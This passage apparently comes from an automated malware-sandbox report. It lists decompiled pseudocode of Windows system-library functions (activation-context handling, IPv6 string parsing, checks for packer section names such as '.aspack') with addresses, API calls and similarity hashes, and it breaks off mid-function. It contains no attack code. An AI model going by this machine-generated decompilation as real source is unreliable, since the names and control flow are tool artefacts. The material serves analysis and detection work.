				_t71 = _t80 >> 0x00000010 ^  *( *( *[fs:0x18] + 0x1a8) + 0x14);
				_t40 =  *( *[fs:0x18] + 0x1a8);
				if((0x00000fff & (_t80 >> 0x00000010 ^  *( *( *[fs:0x18] + 0x1a8) + 0x14))) != 0) {
					_push( *(_t40 + 0x14) & 0x00000fff);
					_push(_t80);
					E6ABF5720(0x33, 0, "SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix\n", "RtlDeactivateActivationContext");
					_t89 = _t89 + 0x18;
					goto L19;
				}
				_t85 =  *_t40;
				_v96 = _t40;
				if(_t85 == 0) {
					goto L14;
				}
				_t67 =  *(_t85 + 8) & 0x00000008;
				asm("sbb ecx, ecx");
				_t79 =  ~_t67 & _t85;
				if(_t67 == 0 ||  *((intOrPtr*)(_t79 + 0xc)) != _t80) {
					goto L22;
				} else {
					_t82 = _t85;
					goto L8;
				}
			}

0x6ab64368
0x6ab64370
0x6ab64372
0x6ab6437e
0x6ab64380
0x6abc072a
0x6abc072d
0x6abc0732
0x6abc0744
0x6abc0744
0x6abc0746
0x6abc0748
0x6abc074d
0x6abc076f
0x6abc076f
0x6abc077b
0x6abc077b
0x6abc0780
0x6abc0780
0x6abc0782
0x6abc0786
0x6abc0798
0x6abc0788
0x6abc0792
0x6abc0794
0x6abc0794
0x6abc079c
0x6abc0776
0x6abc0776
0x00000000
0x6abc079e
0x6abc079e
0x6abc07a7
0x6abc07a9
0x6abc07ac
0x6abc07be
0x6abc07ae
0x6abc07b8
0x6abc07ba
0x6abc07ba
0x6abc07c2
0x00000000
0x00000000
0x00000000
0x6abc07c2
0x6abc07c6
0x00000000
0x00000000
0x6abc07c8
0x6abc07d1
0x6abc07d6
0x6abc07d7
0x6abc07df
0x6abc07e3
0x6abc07e7
0x6abc07eb
0x6abc07f3
0x6ab643fb
0x6ab643fb
0x6ab643fd
0x6ab643fd
0x6ab64400
0x6ab64404
0x6abc0800
0x6abc0805
0x6abc0805
0x6ab6440c
0x6ab64412
0x6ab64414
0x6ab64414
0x6ab64419
0x6ab6441b
0x6ab6441f
0x6ab64423
0x6ab64425
0x6ab64429
0x6ab6442a
0x6ab6442b
0x6ab64436
0x6ab64436
0x6abc079c
0x6ab64386
0x6ab6438b
0x00000000
0x00000000
0x6ab6439d
0x6abc0739
0x6abc073a
0x6abc073f
0x00000000
0x6abc073f
0x6ab643ae
0x6ab643b9
0x6ab643c2
0x6ab643ca
0x6abc0757
0x6abc0758
0x6abc0767
0x6abc076c
0x00000000
0x6abc076c
0x6ab643d0
0x6ab643d2
0x6ab643d8
0x00000000
0x00000000
0x6ab643dd
0x6ab643e4
0x6ab643e6
0x6ab643ea
0x00000000
0x6ab643f9
0x6ab643f9
0x00000000
0x6ab643f9

APIs

DbgPrintEx.1105(00000033,00000000,SXS: %s() called with invalid flags 0x%08lx,RtlDeactivateActivationContext,FFFFFFFE), ref: 6ABC0748
DbgPrintEx.1105(00000033,00000000,SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix,RtlDeactivateActivationContext,?,?), ref: 6ABC0767
RtlRaiseStatus.1105(C000000D), ref: 6ABC077B
RtlRaiseException.1105(?,?,?), ref: 6ABC07F3
RtlReleaseActivationContext.1105(?), ref: 6ABC0800

Strings

SXS: %s() called with invalid flags 0x%08lx, xrefs: 6ABC0732
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 6ABC075E
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 6ABC073F
RtlDeactivateActivationContext, xrefs: 6ABC072D, 6ABC073A, 6ABC0759

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: PrintRaise$ActivationContextExceptionReleaseStatus
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 1148088771-1245972979
Opcode ID: 3be6a71b6114f981d8dfb94ab0acf90a4e287b603627bf283f95cf72d481370a
Instruction ID: 85c66d05caec6bd441859a8c6107fd6ff76d89604755f9b0a28dbdb9dab79bb6
Opcode Fuzzy Hash: 3be6a71b6114f981d8dfb94ab0acf90a4e287b603627bf283f95cf72d481370a
Instruction Fuzzy Hash: 02412775254B919FD719CF18C841F1AB7E1EF80755F11852EF4669B242EF34E800AF92

Uniqueness

Uniqueness Score: -1.00%

Function 6AB60BD0, Relevance: 15.3, APIs: 10, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6AB60BD0(wchar_t* _a4, wchar_t** _a8, intOrPtr _a12) {
				char _v5;
				wchar_t* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				wchar_t* _v28;
				signed int _v32;
				long _t110;
				wchar_t** _t113;
				wchar_t* _t114;
				wchar_t* _t115;
				long _t116;
				long _t117;
				signed int _t118;
				int _t121;
				int _t122;
				void* _t123;
				wchar_t** _t126;
				int _t127;
				int _t128;
				wchar_t** _t129;
				signed int _t130;
				wchar_t* _t134;
				char _t135;
				wchar_t** _t138;
				char _t141;
				wchar_t** _t144;
				intOrPtr _t145;
				wchar_t* _t146;
				signed int _t147;
				long _t150;
				wchar_t** _t151;
				void* _t153;
				intOrPtr _t154;
				wchar_t* _t155;
				void* _t157;

				_t146 = _a4;
				_t144 = 0;
				_t129 = 0;
				_v20 = 0;
				_v28 = 0;
				_v5 = 0;
				_t150 =  *_t146 & 0x0000ffff;
				_v12 = 0;
				_v16 = 0;
				_v32 = 0;
				_v24 = 0;
				if(_t150 == 0) {
					_t134 = 0;
					L10:
					_t151 = _v20;
					 *_a8 = _t146;
					if(_t151 != 0) {
						if(_t151 != 3) {
							L13:
							return 0xc000000d;
						}
						_t134 = _t134 + 1;
						_v12 = _t134;
					}
					_t147 = _v32;
					if(_t147 != 0 || _t134 == 7) {
						if(_t129 != 1) {
							if(_t129 != 2) {
								goto L13;
							}
							_t145 = _a12;
							 *((short*)(_t145 + _v24 * 2)) = 0;
							L68:
							if(_t147 != 0) {
								_t153 = _t145 + _t147 * 2;
								_t89 = _t145 + 0x10; // 0x10
								memmove(_t89 + (_t147 - _t134) * 2, _t153, _t134 - _t147 + _t134 - _t147);
								memset(_t153, 0, 8 - _v12 + 8 - _v12);
							}
							return 0;
						}
						if(_t151 != 0) {
							if(_v16 > 3) {
								goto L13;
							}
							_t135 = wcstol(_v28, 0, 0xa);
							_t157 = _t157 + 0xc;
							if(_t135 > 0xff) {
								goto L13;
							}
							_t145 = _a12;
							 *((char*)(_t151 + _v24 * 2 + _t145)) = _t135;
							_t134 = _v12;
							goto L68;
						}
						if(_v16 > 4) {
							goto L13;
						}
						_t110 = wcstol(_v28, _t151, 0x10);
						_t145 = _a12;
						_t157 = _t157 + 0xc;
						 *((short*)(_t145 + _v24 * 2)) = _t110;
						_t134 = _v12;
						goto L68;
					} else {
						goto L13;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					_t113 = _t129;
					if(_t113 == 0) {
						L15:
						if(_t150 == 0x3a) {
							if(_t144 != 0 || _v12 > _t144) {
								L9:
								_t134 = _v12;
								goto L10;
							} else {
								_t114 =  &(_t146[0]);
								if(_t146[0] != 0x3a) {
									goto L9;
								}
								_t130 = _v24;
								_t154 = _a12;
								_v32 = 1;
								_v12 = 2;
								 *((short*)(_t154 + _t130 * 2)) = 0;
								_v24 = 1 + _t130;
								_t146 = _t114;
								_t47 =  &(_t144[0]); // 0x2
								_t129 = _t47;
								L49:
								_t115 = _v28;
								if(_t115 == 0) {
									goto L24;
								}
								if(_t144 != 0) {
									if(_v16 > 3) {
										goto L13;
									}
									_t116 = wcstol(_t115, 0, 0xa);
									_t157 = _t157 + 0xc;
									if(_t116 > 0xff) {
										goto L13;
									}
									_t144 = _v20;
									 *(_t144 + _v24 * 2 + _t154 - 1) = _t116;
									_t141 = _v5;
									goto L24;
								}
								if(_v16 > 4) {
									goto L13;
								}
								_t117 = wcstol(_t115, _t144, 0x10);
								_t144 = _v20;
								_t157 = _t157 + 0xc;
								_t118 = _v24;
								 *((short*)(_t154 + _t118 * 2)) = _t117;
								_t141 = _v5;
								_v24 = 1 + _t118;
								goto L24;
							}
						}
						_t134 = _v12;
						if(_t134 > 7 || _t150 >= 0x80) {
							goto L10;
						} else {
							_t121 = iswctype(_t150, 4);
							_t157 = _t157 + 8;
							if(_t121 != 0) {
								_t144 = _v20;
								_t129 = 1;
								_t138 = 0;
								_v28 = _t146;
								_v16 = 1;
								L23:
								_v5 = _t138;
								goto L24;
							}
							_t122 = iswctype(_t150, 0x80);
							_t157 = _t157 + 8;
							if(_t122 == 0) {
								goto L9;
							}
							_t144 = _v20;
							if(_t144 != 0) {
								goto L9;
							}
							_t129 = 1;
							_v28 = _t146;
							_v16 = 1;
							L22:
							_t138 = 1;
							goto L23;
						}
					}
					_t123 = _t113 - 1;
					if(_t123 != 0) {
						if(_t123 == 1) {
							goto L15;
						}
						L39:
						if(_t129 == 1) {
							goto L24;
						}
						_t154 = _a12;
						goto L49;
					}
					if(_t150 >= 0x80) {
						L7:
						if(_t150 == 0x3a) {
							if(_t144 != 0) {
								goto L9;
							}
							_t155 = _v12;
							if(_t155 > 6) {
								goto L9;
							}
							if(_t146[0] != 0x3a) {
								_t129 = 0;
								_t126 = 1;
								L38:
								_v12 = _t155 + _t126;
								goto L39;
							}
							if(_v32 != _t144) {
								goto L9;
							}
							_t146 =  &(_t146[0]);
							_v32 = _t155 + 1;
							_t129 = 2;
							_t126 = 2;
							goto L38;
						}
						if(_t150 == 0x2e) {
							if(_t141 != 0 || _t144 > 2 || _v12 > 6) {
								goto L9;
							} else {
								_t154 = _a12;
								_t144 =  &(_t144[0]);
								_v20 = _t144;
								_t129 = 0;
								goto L49;
							}
						}
						goto L9;
					}
					_t127 = iswctype(_t150, 4);
					_t157 = _t157 + 8;
					if(_t127 != 0) {
						_v16 = 1 + _v16;
						_t141 = _v5;
						_t144 = _v20;
						goto L24;
					}
					_t128 = iswctype(_t150, 0x80);
					_t144 = _v20;
					_t157 = _t157 + 8;
					if(_t128 != 0) {
						_v16 =  &(_v16[0]);
						if(_t144 == 0) {
							goto L22;
						}
						goto L9;
					}
					_t141 = _v5;
					goto L7;
					L24:
					_t150 = _t146[0] & 0x0000ffff;
					_t146 =  &(_t146[0]);
				} while (_t150 != 0);
				goto L9;
			}

0x6ab60bdb
0x6ab60bde
0x6ab60be0
0x6ab60be2
0x6ab60be7
0x6ab60bea
0x6ab60bed
0x6ab60bf0
0x6ab60bf3
0x6ab60bf6
0x6ab60bf9
0x6ab60bff
0x6ab60d14
0x6ab60c69
0x6ab60c6c
0x6ab60c6f
0x6ab60c73
0x6abbe8fd
0x6ab60c8d
0x00000000
0x6ab60c8d
0x6abbe903
0x6abbe904
0x6abbe904
0x6ab60c79
0x6ab60c7e
0x6abbe90f
0x6abbe97b
0x00000000
0x00000000
0x6abbe981
0x6abbe989
0x6abbe98d
0x6abbe98f
0x6abbe993
0x6abbe99d
0x6abbe9a5
0x6abbe9b8
0x6abbe9bd
0x00000000
0x6abbe9c0
0x6abbe913
0x6abbe944
0x00000000
0x00000000
0x6abbe956
0x6abbe958
0x6abbe961
0x00000000
0x00000000
0x6abbe96a
0x6abbe970
0x6abbe973
0x00000000
0x6abbe973
0x6abbe919
0x00000000
0x00000000
0x6abbe925
0x6abbe92a
0x6abbe931
0x6abbe937
0x6abbe93b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab60c05
0x6ab60c05
0x6ab60c07
0x6ab60c0a
0x6ab60c9b
0x6ab60c9f
0x6abbe82f
0x6ab60c66
0x6ab60c66
0x00000000
0x6abbe83e
0x6abbe843
0x6abbe846
0x00000000
0x00000000
0x6abbe84c
0x6abbe851
0x6abbe854
0x6abbe85b
0x6abbe862
0x6abbe867
0x6abbe86a
0x6abbe86c
0x6abbe86c
0x6abbe86f
0x6abbe86f
0x6abbe874
0x00000000
0x00000000
0x6abbe87c
0x6abbe8b2
0x00000000
0x00000000
0x6abbe8bd
0x6abbe8c2
0x6abbe8ca
0x00000000
0x00000000
0x6abbe8d0
0x6abbe8d9
0x6abbe8dd
0x00000000
0x6abbe8dd
0x6abbe882
0x00000000
0x00000000
0x6abbe88c
0x6abbe891
0x6abbe898
0x6abbe89b
0x6abbe89e
0x6abbe8a3
0x6abbe8a6
0x00000000
0x6abbe8a6
0x6abbe82f
0x6ab60ca5
0x6ab60cab
0x00000000
0x6ab60cb7
0x6ab60cba
0x6ab60cbf
0x6ab60cc4
0x6abbe8e5
0x6abbe8e8
0x6abbe8ed
0x6abbe8ef
0x6abbe8f2
0x6ab60cf0
0x6ab60cf0
0x00000000
0x6ab60cf0
0x6ab60cd0
0x6ab60cd5
0x6ab60cda
0x00000000
0x00000000
0x6ab60cdc
0x6ab60ce1
0x00000000
0x00000000
0x6ab60ce3
0x6ab60ce8
0x6ab60ceb
0x6ab60cee
0x6ab60cee
0x00000000
0x6ab60cee
0x6ab60cab
0x6ab60c10
0x6ab60c13
0x6abbe7a1
0x00000000
0x00000000
0x6abbe7f9
0x6abbe7fc
0x00000000
0x00000000
0x6abbe802
0x00000000
0x6abbe802
0x6ab60c21
0x6ab60c52
0x6ab60c56
0x6abbe7b9
0x00000000
0x00000000
0x6abbe7bf
0x6abbe7c5
0x00000000
0x00000000
0x6abbe7d0
0x6abbe7ed
0x6abbe7ef
0x6abbe7f4
0x6abbe7f6
0x00000000
0x6abbe7f6
0x6abbe7d5
0x00000000
0x00000000
0x6abbe7de
0x6abbe7e1
0x6abbe7e4
0x6abbe7e9
0x00000000
0x6abbe7e9
0x6ab60c60
0x6abbe809
0x00000000
0x6abbe822
0x6abbe822
0x6abbe825
0x6abbe826
0x6abbe829
0x00000000
0x6abbe829
0x6abbe809
0x00000000
0x6ab60c60
0x6ab60c26
0x6ab60c2b
0x6ab60c30
0x6abbe7a9
0x6abbe7ac
0x6abbe7af
0x00000000
0x6abbe7af
0x6ab60c3c
0x6ab60c41
0x6ab60c44
0x6ab60c49
0x6ab60d08
0x6ab60d0d
0x00000000
0x00000000
0x00000000
0x6ab60d0f
0x6ab60c4f
0x00000000
0x6ab60cf3
0x6ab60cf3
0x6ab60cf7
0x6ab60cfa
0x00000000

APIs

iswctype.1105(?,00000004,00000000,?,00000000,?,?,00000000,00000000), ref: 6AB60C26
iswctype.1105(?,00000080,?,00000000,?,?,00000000,00000000), ref: 6AB60C3C
iswctype.1105(?,00000004,00000000,?,00000000,?,?,00000000,00000000), ref: 6AB60CBA
iswctype.1105(?,00000080,?,00000000,?,?,00000000,00000000), ref: 6AB60CD0
wcstol.1105(?,00000000,00000010,00000000,?,00000000), ref: 6ABBE88C

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: iswctype$wcstol
String ID:
API String ID: 3196148086-0
Opcode ID: e8cce5817cc4ce449349599480dfbb7a9bb6f94171a4a7226f78549168923cd8
Instruction ID: de82d851f3f6cff99d3aa373867985b064b214fe227173d6010b91e32677bc6b
Opcode Fuzzy Hash: e8cce5817cc4ce449349599480dfbb7a9bb6f94171a4a7226f78549168923cd8
Instruction Fuzzy Hash: 0691C175E4429AABDB20CF9AC8807EFBBB1FF41304F11D06AD85467251EF31AA44DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6AB642EB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E6AB642EB(void* __ecx) {
				int _v8;
				void* _v12;
				void* _t25;
				void* _t29;
				int _t32;
				int _t35;
				intOrPtr _t37;
				char* _t40;
				intOrPtr _t42;
				int _t45;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t52;
				void* _t54;
				void* _t55;

				_push(__ecx);
				_push(__ecx);
				_t37 =  *((intOrPtr*)(__ecx + 0x18));
				_t52 = 0;
				E6AB7E9C0(3, _t37, 0, 0,  &_v12);
				_t49 = _v12;
				_t42 =  *((intOrPtr*)(_t49 + 0x78));
				if(_t42 != 0) {
					if( *((intOrPtr*)(_t49 + 0x7c)) <= 0) {
						goto L1;
					}
					_t46 =  *((intOrPtr*)(_t49 + 0x50));
					if(_t42 >= _t46 - 0xd) {
						goto L1;
					}
					_t43 =  *((intOrPtr*)(_t42 + _t37 + 0xc));
					if( *((intOrPtr*)(_t42 + _t37 + 0xc)) > _t46 - 0xc) {
						goto L1;
					}
					_push(0xc);
					_t29 = E6ABAE000(_t43 + _t37, "secserv.dll");
					_t55 = _t54 + 0xc;
					if(_t29 != 0) {
						goto L1;
					}
					_t40 = _t49 + 0x18 + ( *(_t49 + 0x14) & 0x0000ffff);
					_t45 = 1;
					_t32 = 1;
					_v12 = 1;
					_v8 = 1;
					if(0 >=  *(_t49 + 6)) {
						goto L1;
					} else {
						L9:
						while(1) {
							if(_t32 != 0) {
								_t35 = strncmp(_t40, ".txt", 5);
								_t45 = _v12;
								_t55 = _t55 + 0xc;
								_v8 = _t35;
							}
							if(_t45 != 0) {
								_t45 = strncmp(_t40, ".txt2", 6);
								_t55 = _t55 + 0xc;
								_v12 = _t45;
							}
							if(_v8 != 0 || _t45 != 0) {
								_t40 =  &(_t40[0x28]);
								_t52 = _t52 + 1;
								if(_t52 >= ( *(_t49 + 6) & 0x0000ffff)) {
									goto L1;
								}
								_t32 = _v8;
								continue;
							} else {
								_t25 = 1;
								L2:
								return _t25;
							}
						}
					}
				}
				L1:
				_t25 = 0;
				goto L2;
			}

0x6ab642f0
0x6ab642f1
0x6ab642f3
0x6ab642fc
0x6ab64303
0x6ab64308
0x6ab6430b
0x6ab64310
0x6ab6431e
0x00000000
0x00000000
0x6ab64320
0x6ab64328
0x00000000
0x00000000
0x6ab6432a
0x6ab64333
0x00000000
0x00000000
0x6ab64335
0x6ab64340
0x6ab64345
0x6ab6434a
0x00000000
0x00000000
0x6abc06b7
0x6abc06bd
0x6abc06be
0x6abc06bf
0x6abc06c4
0x6abc06cb
0x00000000
0x00000000
0x00000000
0x6abc06d1
0x6abc06d3
0x6abc06dd
0x6abc06e2
0x6abc06e5
0x6abc06e8
0x6abc06e8
0x6abc06ed
0x6abc06fc
0x6abc06fe
0x6abc0701
0x6abc0701
0x6abc0708
0x6abc0719
0x6abc071c
0x6abc071f
0x00000000
0x00000000
0x6abc0725
0x00000000
0x6abc070e
0x6abc070e
0x6ab64314
0x6ab6431a
0x6ab6431a
0x6abc0708
0x6abc06d1
0x6abc06cb
0x6ab64312
0x6ab64312
0x00000000

APIs

RtlImageNtHeaderEx.1105(00000003,?,00000000,00000000,?,?,?,00000000,?,?,?,6AB64176,00000003,?,00000000,00000000), ref: 6AB64303
_strnicmp.1105(?,secserv.dll,0000000C,00000003,?,00000000,00000000,?,?,?,00000000,?,?,?,6AB64176,00000003), ref: 6AB64340
strncmp.1105(?,.txt,00000005), ref: 6ABC06DD
strncmp.1105(?,.txt2,00000006), ref: 6ABC06F7

Strings

secserv.dll, xrefs: 6AB6433A
.txt2, xrefs: 6ABC06F1
.txt, xrefs: 6ABC06D7

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: strncmp$HeaderImage_strnicmp
String ID: .txt$.txt2$secserv.dll
API String ID: 290936131-436433099
Opcode ID: 4f5d2e198783c343db5950d6fcacdea85009f57853624009f3d6d6ed378cecec
Instruction ID: 0cdf22408d37146f45234fd618609d71f24d905213c2224bb3ec54e0903c79ad
Opcode Fuzzy Hash: 4f5d2e198783c343db5950d6fcacdea85009f57853624009f3d6d6ed378cecec
Instruction Fuzzy Hash: 8B21F370A00696B7DB18CF6589A4EAEB7B8FF42309F005139E50697241FB30EA45FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6AB641F7, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6AB641F7(intOrPtr __ecx) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _t26;
				int _t31;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t39;
				void* _t40;
				char* _t42;
				void* _t43;
				int _t49;

				_t33 = __ecx;
				_v12 = __ecx;
				E6AB7E9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v8);
				_t40 = 0;
				_t34 = _v8;
				_v16 =  *((intOrPtr*)(_t33 + 0x1c));
				_t42 = _t34 + 0x18 + ( *(_t34 + 0x14) & 0x0000ffff);
				if(0 >=  *(_t34 + 6)) {
					L8:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					if(_t42[0xc] != 0 && _t42[8] != 0) {
						_t26 = strncmp(_t42, ".aspack", 8);
						_t43 = _t43 + 0xc;
						if(_t26 == 0) {
							L11:
							_t39 = _v16;
							_t37 = _t42[0xc] +  *((intOrPtr*)(_v12 + 0x18));
							if(_t39 >= _t37 && _t39 <= _t42[8] + _t37) {
								L6:
								if(_t49 == 0) {
									return 1;
								}
							}
							goto L7;
						}
						_t31 = strncmp(_t42, ".pcle", 6);
						_t43 = _t43 + 0xc;
						if(_t31 == 0) {
							goto L11;
						}
						_t32 = strncmp(_t42, ".sforce", 8);
						_t43 = _t43 + 0xc;
						_t49 = _t32;
						goto L6;
					}
					L7:
					_t40 = _t40 + 1;
					_t42 =  &(_t42[0x28]);
				} while (_t40 < ( *(_t34 + 6) & 0x0000ffff));
				goto L8;
			}

0x6ab64205
0x6ab6420f
0x6ab64214
0x6ab6421c
0x6ab6421e
0x6ab64221
0x6ab6422b
0x6ab64233
0x6ab64291
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab64235
0x6ab64235
0x6ab64239
0x6ab64249
0x6ab6424e
0x6ab64253
0x6abc064c
0x6abc0652
0x6abc0655
0x6abc065a
0x6ab64283
0x6ab64283
0x00000000
0x6ab6429a
0x6ab64283
0x00000000
0x6abc065a
0x6ab64261
0x6ab64266
0x6ab6426b
0x00000000
0x00000000
0x6ab64279
0x6ab6427e
0x6ab64281
0x00000000
0x6ab64281
0x6ab64285
0x6ab64289
0x6ab6428a
0x6ab6428d
0x00000000

APIs

RtlImageNtHeaderEx.1105(00000003,?,00000000,00000000,?,?,?,00000000), ref: 6AB64214
strncmp.1105(?,.aspack,00000008,00000003,?,00000000,00000000,?,?,?,00000000), ref: 6AB64249
strncmp.1105(?,.pcle,00000006,?,?,00000000), ref: 6AB64261
strncmp.1105(?,.sforce,00000008,?,?,?,?,?,00000000), ref: 6AB64279

Strings

.aspack, xrefs: 6AB64243
.pcle, xrefs: 6AB6425B
.sforce, xrefs: 6AB64273

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: strncmp$HeaderImage
String ID: .aspack$.pcle$.sforce
API String ID: 3137002299-3067156003
Opcode ID: 35eb11983fa57b33444341417b1053767852679bbf1c1fb82cfa556c7621f6bd
Instruction ID: 272ae88f783c2bb23ea013693562e72f72dfef28feb30c9f36668eb12451eb28
Opcode Fuzzy Hash: 35eb11983fa57b33444341417b1053767852679bbf1c1fb82cfa556c7621f6bd
Instruction Fuzzy Hash: 93215B39A006406BEB20CF55DD81FBFB3B9EF44308F118024ED0996286EF70E995E691

Uniqueness

Uniqueness Score: -1.00%

Function 6AB7EC7F, Relevance: 12.3, APIs: 8, Instructions: 256
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6AB7EC7F(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t65;
				intOrPtr* _t67;
				intOrPtr _t69;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t75;
				intOrPtr _t76;
				signed int _t77;
				void* _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t83;
				void* _t85;
				intOrPtr _t90;
				void* _t91;
				void* _t96;
				void _t99;
				intOrPtr* _t104;
				intOrPtr* _t106;
				unsigned int _t112;
				unsigned int _t114;
				intOrPtr* _t115;
				void* _t118;
				intOrPtr _t120;
				unsigned int _t122;
				unsigned int _t124;
				intOrPtr* _t125;
				intOrPtr* _t129;
				intOrPtr* _t134;
				intOrPtr* _t136;
				void* _t138;
				signed int* _t140;
				void* _t141;
				void* _t143;
				void* _t146;
				intOrPtr _t148;
				void* _t149;
				void* _t151;
				void* _t153;

				_push(_t96);
				_t146 = __ecx;
				_push(_t138);
				_t65 =  *(__ecx + 0x50);
				if( *((intOrPtr*)(_t65 + 0xc)) == 0xffffffff) {
					L3:
					return _t65;
				} else {
					_t65 =  *_t65;
					if(( *(_t65 - 0x20) & 0x00000020) != 0) {
						goto L3;
					} else {
						_t65 = _t65 | 0xffffffff;
						asm("lock xadd [esi+0x9c], eax");
						if(_t65 == 0) {
							E6AB82280(_t65, 0x6ac584d8);
							_t67 = _t146 + 0x54;
							_t120 =  *_t67;
							if( *((intOrPtr*)(_t120 + 4)) != _t67) {
								L15:
								_push(3);
								asm("int 0x29");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(0x30);
								_push(0x6ac3fb78);
								E6ABBD08C(_t96, _t138, _t146);
								_t148 =  *((intOrPtr*)(_t153 + 8));
								if(_t148 == 0) {
									L59:
									_t69 = 0xc000000d;
								} else {
									_t140 =  *(_t153 + 0x14);
									if(_t140 == 0) {
										goto L59;
									} else {
										 *((intOrPtr*)(_t153 - 4)) = 0;
										if( *((intOrPtr*)(_t153 + 0xc)) >= 0x10000) {
											_t122 =  *(_t148 + 0x58) >> 1;
											 *(_t153 - 0x20) = _t122;
											_t104 =  *((intOrPtr*)(_t148 + 0x54)) + _t148;
											 *((intOrPtr*)(_t153 - 0x1c)) = _t104;
											if(_t104 <= 0x10000) {
												L37:
												if( *_t104 == 0) {
													goto L54;
												} else {
													_t72 = 1;
													if(_t122 <= 0) {
														goto L54;
													}
												}
											} else {
												while(_t122 > 0) {
													if( *_t104 == 0) {
														L54:
														_t72 = 0;
													} else {
														_t78 = E6ABAE490( *((intOrPtr*)(_t153 + 0xc)), _t104);
														_t104 =  *((intOrPtr*)(_t153 - 0x1c));
														if(_t78 != 0) {
															_t129 = _t104;
															_t54 = _t129 + 2; // 0x22
															 *((intOrPtr*)(_t153 - 0x2c)) = _t54;
															do {
																_t80 =  *_t129;
																_t129 = _t129 + 2;
															} while (_t80 != 0);
															_t81 = (_t129 -  *((intOrPtr*)(_t153 - 0x2c)) >> 1) + 1;
															_t104 = _t104 + _t81 * 2;
															 *((intOrPtr*)(_t153 - 0x1c)) = _t104;
															_t122 =  *(_t153 - 0x20) - _t81;
															 *(_t153 - 0x20) = _t122;
															continue;
														} else {
															_t122 =  *(_t153 - 0x20);
															goto L37;
														}
													}
													goto L39;
												}
												goto L37;
											}
											L39:
											if(_t72 == 0) {
												 *_t140 =  *_t140 | 0x00040000;
											}
											_t124 =  *(_t148 + 0x68) >> 1;
											 *(_t153 - 0x28) = _t124;
											_t106 =  *((intOrPtr*)(_t148 + 0x64)) + _t148;
											 *((intOrPtr*)(_t153 - 0x24)) = _t106;
											if(_t106 <= 0x10000) {
												L56:
												if( *_t106 == 0 || _t124 <= 0) {
													goto L29;
												} else {
													_t73 = 1;
												}
											} else {
												while(_t124 > 0) {
													if( *_t106 == 0) {
														L29:
														_t73 = 0;
													} else {
														_t75 = E6ABAE490( *((intOrPtr*)(_t153 + 0xc)), _t106);
														_t106 =  *((intOrPtr*)(_t153 - 0x24));
														if(_t75 == 0) {
															_t124 =  *(_t153 - 0x28);
															goto L56;
														} else {
															_t125 = _t106;
															_t47 = _t125 + 2; // 0xc00000e7
															_t149 = _t47;
															do {
																_t76 =  *_t125;
																_t125 = _t125 + 2;
															} while (_t76 != 0);
															_t48 = (_t125 - _t149 >> 1) + 1; // 0xc00000e4
															_t77 = _t48;
															_t106 = _t106 + _t77 * 2;
															 *((intOrPtr*)(_t153 - 0x24)) = _t106;
															_t124 =  *(_t153 - 0x28) - _t77;
															 *(_t153 - 0x28) = _t124;
															continue;
														}
													}
													goto L30;
												}
												goto L56;
											}
											L30:
											if(_t73 != 0) {
												goto L27;
